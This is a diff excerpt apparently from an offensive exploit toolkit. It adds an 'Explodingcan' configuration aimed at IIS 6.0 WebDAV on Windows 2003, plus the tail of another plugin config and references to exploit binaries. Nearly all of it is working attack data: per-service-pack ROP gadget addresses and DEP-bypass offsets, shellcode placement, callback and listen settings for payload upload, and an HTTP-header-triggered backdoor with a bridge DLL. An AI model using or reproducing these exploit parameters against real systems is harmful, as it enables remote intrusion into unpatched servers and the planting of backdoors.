<t:parameter name="AddrIncEax" description="" type="U32" value="0x600F8E54" hidden="true" />
|
||||
<t:parameter name="AddrJmpEax" description="" type="U32" value="0x00429A6C" hidden="true" />
|
||||
|
||||
<!-- Return Addresses appearing in null-friendly buffer after conventional DEP defeat -->
|
||||
<t:parameter name="AddrSetAtEdxRet" description="" type="U32" value="0x004050A7" hidden="true" />
|
||||
<t:parameter name="AddrClrEaxRet" description="" type="U32" value="0x6001FAC1" hidden="true" />
|
||||
|
||||
<t:parameter name="OffsetEsp2Buffer" description="" type="U32" value="0x000000BC" hidden="true" />
|
||||
<t:parameter name="OffsetEsp2Ebp" description="" type="U32" value="0x00000090" hidden="true" />
|
||||
<t:parameter name="CleanupOverflowed" description="" type="U32" value="0x60B3FDF8" hidden="true" />
|
||||
</t:paramgroup>
|
||||
|
||||
</t:paramchoice>
|
||||
|
||||
</t:inputparameters>
|
||||
|
||||
<t:outputparameters>
|
||||
<t:parameter name="Contract"
|
||||
description="The contract fulfilled by this plugin"
|
||||
type="String"
|
||||
value="StagedUpload"/>
|
||||
<t:parameter name="ConnectedTcp" type="Socket" description="the connected socket to the target following exploitation"/>
|
||||
<t:parameter name="XorMask" type="U8" description="the xor-mask set in the exploit for decoding the payload"/>
|
||||
</t:outputparameters>
|
||||
|
||||
<t:redirection>
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[name='imap']/port"
|
||||
closeoncompletion="true"/>
|
||||
<t:remote protocol="TCP"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
</t:redirection>
|
||||
</t:config>
|
||||
BIN
windows/exploits/Ewokfrenzy-2.0.0.exe
Normal file
BIN
windows/exploits/Ewokfrenzy-2.0.0.exe
Normal file
Binary file not shown.
625
windows/exploits/Explodingcan-2.0.2.0.xml
Normal file
625
windows/exploits/Explodingcan-2.0.2.0.xml
Normal file
|
|
@ -0,0 +1,625 @@
|
|||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<config xmlns='urn:trch' name='Explodingcan' version='2.0.2' schemaversion='2.1.0' configversion='2.0.2.0' id='9b6d2c7a836744e5cd54e4db262f09c67a5cae17'>
|
||||
<inputparameters>
|
||||
<paramchoice name='PayloadAccessType' description='Callback/Listen Payload Access'>
|
||||
<paramgroup name='Callback' description='Target connect() callback for payload upload connection'>
|
||||
<parameter type='IPv4' name='CallbackIp' description='Callback IP Address'/>
|
||||
<parameter type='TcpPort' name='CallbackPort' description='Callback port'/>
|
||||
<parameter type='TcpPort' name='CallbackLocalPort' description='Local callback port'/>
|
||||
</paramgroup>
|
||||
<paramgroup name='Listen' description='Target listen()/accept() for payload upload connection'>
|
||||
<parameter type='TcpPort' name='ListenPort' description='Listen port for shellcode to listen/accept on target'/>
|
||||
<parameter type='TcpPort' name='ListenLocalPort' description='Local listen por'/>
|
||||
<parameter type='U16' name='CallinTimeout' description='Sleep time before making callin to target'>
|
||||
<default>10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Backdoor' description='Target open HTTP backdoor for payload upload connection'>
|
||||
<paramchoice name='BackdoorHeader' description='Name of HTTP header used to trigger backdoor.'>
|
||||
<default>If-Match</default>
|
||||
<paramgroup name='Accept' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>20</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Accept-Charset' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>21</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Accept-Encoding' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>22</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Accept-Language' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>23</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Allow' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Authorization' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>24</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Cache-Control' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Content-Encoding' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>13</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Content-Language' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>14</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Content-Location' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>15</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Content-MD5' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>16</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Content-Range' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>17</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Content-Type' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>12</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Cookie' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>25</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Date' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Expect' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>26</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Expires' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>18</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='From' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>27</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='If-Match' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>29</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='If-Modified-Since' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>30</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='If-None-Match' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>31</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='If-Range' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>32</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='If-Unmodified-Since' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>33</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Last-Modified' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>19</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Max-Forwards' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>34</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Pragma' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>4</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Proxy-Authorization' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>35</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Range' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>37</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Referer' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>36</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Trailer' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Translate' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>39</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Upgrade' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>7</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='User-Agent' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>40</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Via' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>8</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Warning' description=''>
|
||||
<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
|
||||
<default>9</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<paramchoice name='BackdoorValueSource' description='Method of generating value for HTTP trigger header.'>
|
||||
<default>RandomEtag</default>
|
||||
<paramgroup name='Manual' description='Operator-controlled value.'>
|
||||
<parameter type='String' name='BackdoorValue' description='HTTP header value used to trigger backdoor.'/>
|
||||
</paramgroup>
|
||||
<paramgroup name='RandomEtag' description='Randomly generated HTTP Etag string.'>
|
||||
<parameter hidden='true' type='String' name='BackdoorValue' description=''>
|
||||
<default><RANDOM_ETAG></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='RandomBasicAuth' description='Randomly generated Basic Auth credential string.'>
|
||||
<parameter hidden='true' type='String' name='BackdoorValue' description=''>
|
||||
<default><RANDOM_BASIC_AUTH></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<parameter type='U32' name='BackdoorDelay' description='How long to wait (in seconds) for trigger responses.'>
|
||||
<default>10</default>
|
||||
</parameter>
|
||||
<parameter type='U32' name='BackdoorRetries' description='Maximum number of times to try triggering the backdoor.'>
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='PccpPy' description='Full path to pccp.pyc.'>
|
||||
<value>D:\DSZOPSDISK\storage\pccp.pyc</value>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='BackdoorBridgeDLL' description='Full path to IIS-backdoor-to-PC-host DLL.'>
|
||||
<value>D:\DSZOPSDISK\storage\brdg.dll</value>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='PythonExe' description='Full path to Python [2.6] executable.'>
|
||||
<value>C:\Python26\python.exe</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<parameter type='IPv4' name='TargetIp' description='Target IP Address'/>
|
||||
<parameter type='TcpPort' name='TargetPort' description='Port of the HTTP service'>
|
||||
<default>80</default>
|
||||
</parameter>
|
||||
<parameter type='U16' name='NetworkTimeout' description='Network timeout (in seconds)'>
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
<parameter type='Boolean' name='EnableSSL' description='Enable SSL for HTTPS targets'>
|
||||
<default>false</default>
|
||||
</parameter>
|
||||
<parameter type='U32' name='IISPathSize' description='Length of IIS path (between 3 and 68)'>
|
||||
<default>18</default>
|
||||
</parameter>
|
||||
<parameter type='String' name='hostString' description='String to use in HTTP requests'>
|
||||
<default>localhost</default>
|
||||
</parameter>
|
||||
<paramchoice name='AuthenticationType' description='Authentication type for target'>
|
||||
<default>None</default>
|
||||
<paramgroup name='None' description='No authentication'/>
|
||||
<paramgroup name='Basic' description='Basic HTTP authentication'>
|
||||
<parameter type='String' name='Username' description='Valid basic authenticiation username'/>
|
||||
<parameter type='String' name='Password' description='Valid basic authenticiation password'/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<parameter hidden='true' type='U32' name='buf1size' description=''>
|
||||
<value>0x110</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='buf2size' description=''>
|
||||
<value>0xc00</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SkipFree' description=''>
|
||||
<value>0x02020202</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SkipOffset' description=''>
|
||||
<value>0xDC</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='VirtualProtectOffset' description=''>
|
||||
<value>0x11C</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='WriteAddressOffset1' description=''>
|
||||
<value>0xE0</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='WriteAddressOffset2' description=''>
|
||||
<value>0x124</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ObjectAddress' description=''>
|
||||
<value>0x100</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ObjectAddressOffset1' description=''>
|
||||
<value>0x10C</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ObjectAddressOffset4' description=''>
|
||||
<value>0xFC</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ObjectAddressOffset2' description=''>
|
||||
<value>0xE8</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ObjectAddressOffset3' description=''>
|
||||
<value>0xD8</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEcxEspOffset' description=''>
|
||||
<value>0xFC</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='StackAdjustOffset1' description=''>
|
||||
<value>0xDC</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='StackAdjustOffset2' description=''>
|
||||
<value>0xE0</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='StackAdjustOffset3' description=''>
|
||||
<value>0x138</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='Push40Offset' description=''>
|
||||
<value>0x10C</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LeaveRetOffset1' description=''>
|
||||
<value>0x134</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LeaveRetOffset2' description=''>
|
||||
<value>0x174</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SetEbp1' description=''>
|
||||
<value>0x174</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SetEbp1Offset' description=''>
|
||||
<value>0x130</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SetEbp2' description=''>
|
||||
<value>0x15C</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SetEbp2Offset' description=''>
|
||||
<value>0x14c</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SetEbp3' description=''>
|
||||
<value>0x138</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SetEbp3Offset' description=''>
|
||||
<value>0x170</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEbpOffset' description=''>
|
||||
<value>0x150</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ShellcodeAddr' description=''>
|
||||
<value>0x1a0</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ShellcodeAddrOffset' description=''>
|
||||
<value>0x118</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ShellcodeOffset' description=''>
|
||||
<value>0x178</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='JmpEBXOffset' description=''>
|
||||
<value>0x114</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ProcHandleOffset' description=''>
|
||||
<value>0x120</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='VProtSizeOffset' description=''>
|
||||
<value>0x128</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEaxOffset' description=''>
|
||||
<value>0x138</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='EaxValOffset' description=''>
|
||||
<value>0x160</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax2Offset' description=''>
|
||||
<value>0x168</value>
|
||||
</parameter>
|
||||
<paramchoice name='Target' description='Target OS'>
|
||||
<paramgroup name='W2K3SP0' description='Windows 2003 Base'>
|
||||
<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
|
||||
<value>0x010021d0</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='WriteAddress' description=''>
|
||||
<value>0x01002030</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='StackAdjust' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='Push40' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LeaveRet' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEbp' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='JmpEBX' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='VProtSize' description=''>
|
||||
<value>0x01002034</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax2' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP1' description='Windows 2003 Service Pack 1'>
|
||||
<parameter hidden='true' type='U32' name='WriteAddress' description=''>
|
||||
<value>0x01003030</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
|
||||
<value>0x68015cd2</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='StackAdjust' description=''>
|
||||
<value>0x68006D5F</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='Push40' description=''>
|
||||
<value>0x6800B023</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LeaveRet' description=''>
|
||||
<value>0x6801277f</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEbp' description=''>
|
||||
<value>0x68006d15</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='JmpEBX' description=''>
|
||||
<value>0x6801227b</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
|
||||
<value>0x7ffe0300</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='VProtSize' description=''>
|
||||
<value>0x6802906c</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax' description=''>
|
||||
<value>0x680092a1</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
|
||||
<value>0x68008156</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax2' description=''>
|
||||
<value>0x680229a1</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP2' description='Windows 2003 Service Pack 2'>
|
||||
<parameter hidden='true' type='U32' name='WriteAddress' description=''>
|
||||
<value>0x680312C0</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
|
||||
<value>0x68016082</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='StackAdjust' description=''>
|
||||
<value>0x68006E4F</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='Push40' description=''>
|
||||
<value>0x6800B113</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LeaveRet' description=''>
|
||||
<value>0x680129E7</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEbp' description=''>
|
||||
<value>0x68006e05</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='JmpEBX' description=''>
|
||||
<value>0x680124e3</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
|
||||
<value>0x7ffe0300</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='VProtSize' description=''>
|
||||
<value>0x6803046e</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax' description=''>
|
||||
<value>0x68009391</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
|
||||
<value>0x68008246</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax2' description=''>
|
||||
<value>0x68021daa</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP0_v5IM' description='Windows 2003 Base (IIS 5.0 Isolation Mode)'>
|
||||
<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
|
||||
<value>0x010043d0</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='WriteAddress' description=''>
|
||||
<value>0x01004230</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='StackAdjust' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='Push40' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LeaveRet' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEbp' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='JmpEBX' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='VProtSize' description=''>
|
||||
<value>0x01004234</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax2' description=''>
|
||||
<value>0xffffffff</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP1_v5IM' description='Windows 2003 Service Pack 1 (IIS 5.0 Isolation Mode)'>
|
||||
<parameter hidden='true' type='U32' name='WriteAddress' description=''>
|
||||
<value>0x01004200</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEcxEsp' description=''>
|
||||
<value>0x68015cd2</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='StackAdjust' description=''>
|
||||
<value>0x68006D5F</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='Push40' description=''>
|
||||
<value>0x6800B023</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LeaveRet' description=''>
|
||||
<value>0x6801277f</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MovEbp' description=''>
|
||||
<value>0x68006d15</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='JmpEBX' description=''>
|
||||
<value>0x6801227b</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='SyscallAddress' description=''>
|
||||
<value>0x7ffe0300</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='VProtSize' description=''>
|
||||
<value>0x6802906c</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax' description=''>
|
||||
<value>0x680092a1</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='EaxValAddress' description=''>
|
||||
<value>0x68008156</value>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='LoadEax2' description=''>
|
||||
<value>0x680229a1</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</inputparameters>
|
||||
<outputparameters>
|
||||
<paramchoice name='Contract' description='The contract fulfilled by this plugin'>
|
||||
<value>StagedUpload</value>
|
||||
<paramgroup name='StagedUpload' description=''>
|
||||
<parameter type='Socket' name='ConnectedTcp' description='The connected socket'/>
|
||||
<parameter type='U8' name='XorMask' description='Masking byte'/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</outputparameters>
|
||||
<errors>
|
||||
<errorcode name='EXCA_SUCCESS' value='EDF_SUCCESS' description='Explodingcan executed successfully.'/>
|
||||
</errors>
|
||||
<redirection>
|
||||
<local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='true' destaddr='TargetIp' destport='TargetPort'/>
|
||||
<local protocol='TCP' listenaddr='TargetIp' listenport='ListenLocalPort' closeoncompletion='true' destaddr='TargetIp' destport='ListenPort'/>
|
||||
<remote protocol='TCP' listenport='CallbackPort' listenaddr='CallbackIp' destport='CallbackLocalPort'/>
|
||||
</redirection>
|
||||
<logic>
|
||||
<and>
|
||||
<or>
|
||||
<service name='http'>
|
||||
<and>
|
||||
<product version='6.0' name='Microsoft IIS'/>
|
||||
<service name='http-option-propfind'>
|
||||
<bindtovalue name='EnableSSL' value='false'/>
|
||||
<bindtopath path="//service[name='http']/port" name='TargetPort'/>
|
||||
<bindtopath path="//service[name='http']/product/misc_product_info[name='IISPathSize']/value" name='IISPathSize'/>
|
||||
</service>
|
||||
</and>
|
||||
</service>
|
||||
<service name='https'>
|
||||
<and>
|
||||
<product version='6.0' name='Microsoft IIS'/>
|
||||
<service name='http-option-propfind'>
|
||||
<bindtovalue name='EnableSSL' value='true'/>
|
||||
<bindtopath path="//service[name='https']/port" name='TargetPort'/>
|
||||
<bindtopath path="//service[name='https']/product/misc_product_info[name='IISPathSize']/value" name='IISPathSize'/>
|
||||
</service>
|
||||
</and>
|
||||
</service>
|
||||
</or>
|
||||
<or>
|
||||
<os servicepack='2' name='Windows 2003' family='windows'>
|
||||
<bindtovalue name='Target' value='W2K3SP2'/>
|
||||
</os>
|
||||
<os servicepack='1' name='Windows 2003' family='windows'>
|
||||
<bindtovalue name='Target' value='W2K3SP1'/>
|
||||
</os>
|
||||
<os servicepack='0' name='Windows 2003' family='windows'>
|
||||
<bindtovalue name='Target' value='W2K3SP0'/>
|
||||
</os>
|
||||
<os servicepack='unknown' name='Windows 2003' family='windows'>
|
||||
<or>
|
||||
<os>
|
||||
<bindtovalue name='Target' value='W2K3SP2'/>
|
||||
</os>
|
||||
<os>
|
||||
<bindtovalue name='Target' value='W2K3SP0'/>
|
||||
</os>
|
||||
<os>
|
||||
<bindtovalue name='Target' value='W2K3SP1'/>
|
||||
</os>
|
||||
</or>
|
||||
</os>
|
||||
</or>
|
||||
<bindtovalue name='PayloadAccessType' value='Callback'/>
|
||||
</and>
|
||||
</logic>
|
||||
</config>
|
||||
BIN
windows/exploits/Explodingcan-2.0.2.exe
Normal file
BIN
windows/exploits/Explodingcan-2.0.2.exe
Normal file
Binary file not shown.
32
windows/exploits/Explodingcan-2.0.2.fb
Normal file
32
windows/exploits/Explodingcan-2.0.2.fb
Normal file
|
|
@ -0,0 +1,32 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="9b6d2c7a836744e5cd54e4db262f09c67a5cae17"
|
||||
name="Explodingcan"
|
||||
version="2.0.2"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
|
||||
<t:touchlist>
|
||||
<t:plugin
|
||||
name="Iistouch"
|
||||
displayname="IIS Touch"
|
||||
description="Touch to get IIS Info."
|
||||
postmessage="Explodingcan requires WEBDAV on Windows 2003 IIS 6.0">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
|
||||
<t:ivparam name="EnableSSL" value="EnableSSL"/>
|
||||
</t:plugin>
|
||||
<t:plugin name="Explodingcantouch"
|
||||
